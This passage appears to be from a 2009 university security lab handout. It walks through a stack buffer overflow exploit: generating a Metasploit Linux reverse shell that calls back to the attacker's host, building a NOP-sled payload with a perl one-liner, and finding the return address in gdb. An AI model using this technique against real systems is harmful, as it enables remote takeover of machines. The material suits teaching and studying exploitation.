msfweb

Step 7: Click on the PAYLOADS button and search for "Linux command shell, reverse". Find the reverse shell for the x86 architecture.

Step 8: Generate a new shell with the following options:
LPORT: 9999
LHOST: <your backtrack ip addr>

Step 9: Copy the generated code and strip off the quotes ("), newlines, and spaces.

Step 10: Note the size in bytes of the generated shellcode. Then compute 1032 - 600 - 4 - <size of shellcode> = number of NOPs you need.

Step 11: Run the following command to test whether you are still generating an overflow:
`perl -e 'print "A"x600,"\x90"x<#nops>,"<shellcode>","BBBB"'`

Step 12: You should see EIP overwritten with \x42\x42\x42\x42 (the "BBBB" bytes). You now need to find an address inside the NOP sled at which to start executing your code. Dump the stack from the stack pointer:
(gdb) x/2000xb $esp

Step 13: Reverse the byte order of the chosen address (x86 is little-endian), i.e. AABBCCDD becomes \xDD\xCC\xBB\xAA, and replace the previous "BBBB" with that code location....
- Fall '09